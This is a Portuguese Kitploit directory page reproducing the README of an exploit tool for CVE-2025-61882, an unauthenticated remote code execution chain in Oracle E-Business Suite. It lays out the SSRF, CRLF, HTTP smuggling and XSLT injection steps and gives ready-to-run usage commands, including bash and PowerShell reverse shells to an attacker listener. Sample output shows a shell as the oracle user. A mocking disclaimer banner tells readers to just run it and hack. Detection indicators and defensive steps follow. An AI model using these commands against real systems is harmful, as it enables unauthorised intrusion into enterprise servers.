Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-61882-POC — Exploit para CVE-2025-61882, uma RCE crítica pré-autenticação no Oracle E-Business Suite. Combina SSRF, injeção CRLF, contrabando HTTP e injeção XSLT para execução remota de código não autenticada. | Kitploit
Ferramentas/GitHubGitHub/mindflarex/cve-2025-61882-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubmindflarex/cve-2025-61882-poc

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

CVE-2025-61882-POC

Exploit para CVE-2025-61882, uma RCE crítica pré-autenticação no Oracle E-Business Suite. Combina SSRF, injeção CRLF, contrabando HTTP e injeção XSLT para execução remota de código não autenticada.

Ver Repositório
2há 3 mesesAinda não revisado
Compartilhar

Ferramenta de Teste de Segurança CVE-2025-61882

CVSS Status Platform License

🚨 AVISO LEGAL CRÍTICO

Veja nossa postagem no blog para detalhes técnicos

ESTA FERRAMENTA É APENAS PARA TESTES DE SEGURANÇA AUTORIZADOS

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║                                                              ║
║  🚨 ACESSO NÃO AUTORIZADO A SISTEMAS DE COMPUTADOR É ILEGAL 🚨   ║
║                                                              ║
║  Ao usar esta ferramenta, você reconhece e concorda que:         ║
║                                                              ║
║                                                              ║
║                 F0DA-SE ISSO, APENAS EXECUTE E HACKEIE                   ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
║                                                              ║
╚══════════════════════════════════════════════════════════════╝

📋 Visão Geral

Ferramenta de teste de segurança para CVE-2025-61882, uma vulnerabilidade crítica de execução remota de código sem autenticação que afeta o Oracle E-Business Suite.

Criado por: Mindflare

Detalhes da Vulnerabilidade

  • CVE ID: CVE-2025-61882
  • Pontuação CVSS: 9.8 (Crítico)
  • Vetor de Ataque: Rede (Não Autenticado)
  • Complexidade do Ataque: Média
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma
  • Versões Afetadas: Oracle E-Business Suite 12.2.3 - 12.2.14
  • Status do Patch: Patch de emergência lançado em 4 de outubro de 2025
  • Status de Exploração: ⚠️ ATIVAMENTE EXPLORADO pelo ransomware Cl0p desde agosto de 2025

Resumo Técnico

CVE-2025-61882 é uma sofisticada cadeia de exploração que combina cinco vulnerabilidades distintas:

  1. SSRF - Server-Side Request Forgery via /OA_HTML/configurator/UiServlet
  2. Injeção CRLF - Injeção de cabeçalho HTTP no parâmetro return_url
  3. Contrabando HTTP - Abuso de conexão keep-alive para alcançar serviços internos (porta 7201)
  4. Bypass de Autenticação - Path traversal via prefixo /OA_HTML/help/../
  5. Injeção XSLT - Processamento malicioso de template XSL leva a RCE

🎯 Casos de Uso Pretendidos

✅ Uso Aceitável

  • Testes de penetração autorizados com permissão por escrito
  • Pesquisa de segurança em sistemas que você possui
  • Validação de vulnerabilidades em ambientes de laboratório controlados
  • Exercícios de red team com documentação de escopo adequada
  • Pesquisa acadêmica com aprovação institucional
  • Resposta a incidentes e análise forense

❌ Uso Proibido

  • Qualquer acesso não autorizado a sistemas
  • Testar sistemas sem permissão explícita por escrito
  • Atividades maliciosas ou causar danos
  • Atacar sistemas de produção sem aprovação
  • Usar para fins criminosos
  • Qualquer atividade que viole as leis aplicáveis

📦 Instalação

Pré-requisitos

  • Python 3.7 ou superior
  • gerenciador de pacotes pip
  • Conectividade de rede com o alvo (somente autorizado)
  • Netcat ou ouvinte similar para receber reverse shell

Configuração

root@kitploit:~
# Clone o repositório
git clone https://github.com/[SEU-USUARIO]/CVE-2025-61882-POC
cd CVE-2025-61882-POC

# Instale as dependências
pip3 install -r requirements.txt

# Torne o script executável (Linux/Mac)
chmod +x cve-2025-61882-detector.py

🚀 Uso

Passo 1: Configure Seu Ouvinte

Em um terminal separado, inicie um ouvinte netcat:

root@kitploit:~
# Linux/Mac
nc -lvnp 4444

# Windows
nc.exe -lvnp 4444

Passo 2: Execute a Ferramenta

Uso Básico (Alvo Linux):

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' \
  --platform linux

Alvo Windows:

root@kitploit:~
python3 cve-2025-61882-detector.py \
  --target http://192.168.1.22:8000 \
  --lhost 192.168.1.10 \
  --lport 80 \
  --command 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\"192.168.1.10\",4444)"' \
  --platform windows

Parâmetros

ParâmetroDescriçãoObrigatórioExemplo
--targetURL do Oracle EBS alvoSimhttp://192.168.1.22:8000
--lhostSeu endereço IP (para callbacks)Sim192.168.1.10
--lportPorta do servidor HTTP (serve payload XSL)Sim80 ou 8080
--commandComando a ser executado no alvoSimVeja exemplos acima
--platformSO alvo: linux ou windowsSimlinux

📊 Exemplo de Saída

Saída da Ferramenta

root@kitploit:~
[*] Target URL:    http://192.168.1.22:8000
[*] Listener IP:   192.168.1.10
[*] Listener Port: 80
[*] Platform:      linux

[*] HTTP server started on 192.168.1.10:80
[*] Connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking HTTP smuggle stub...
[*] Sending exploit payload...
[*] Exploit payload sent successfully

[+] 192.168.1.22 - GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1
[+] XSL payload served successfully

Saída do Ouvinte Netcat (Se Vulnerável)

root@kitploit:~
ubuntu@attacker:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.22 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
[oracle@apps EBS_domain]$

🛡️ Detecção e Defesa

Para Defensores de Segurança

Ações Imediatas

  1. Aplicar Patch de Emergência Oracle (ID do Documento: 30061882.1)
  2. Buscar por Comprometimento:
    root@kitploit:~
    SELECT * FROM XDO_TEMPLATES_B 
    WHERE TEMPLATE_CODE LIKE 'TMP%' OR TEMPLATE_CODE LIKE 'DEF%';
    
  3. Revisar Logs de Acesso desde agosto de 2025
  4. Bloquear internet de saída dos servidores EBS

Indicadores de Detecção

IOCs de Rede:

root@kitploit:~
200.107.207.26 (Cl0p C2)
161.97.99.49 (Secundário)

Padrões HTTP:

  • POST /OA_HTML/configurator/UiServlet
  • POST /OA_HTML/SyncServlet
  • GET /OA_HTML/help/../*.jsp
  • Caracteres CRLF em parâmetros

📚 Referências

  • Aviso de Alerta de Segurança Oracle
  • Catálogo KEV da CISA
  • Análise Google/Mandiant
  • Pesquisa watchTowr Labs

📜 Licença

Licença MIT com Restrições de Uso Educacional - Veja LICENSE

AVISO LEGAL: Este software é apenas para testes de segurança autorizados. Acesso não autorizado a sistemas de computador é ilegal. O autor não assume responsabilidade por uso indevido.


Criado por: Mindflare | Última Atualização: Outubro 2025

Baixar ferramenta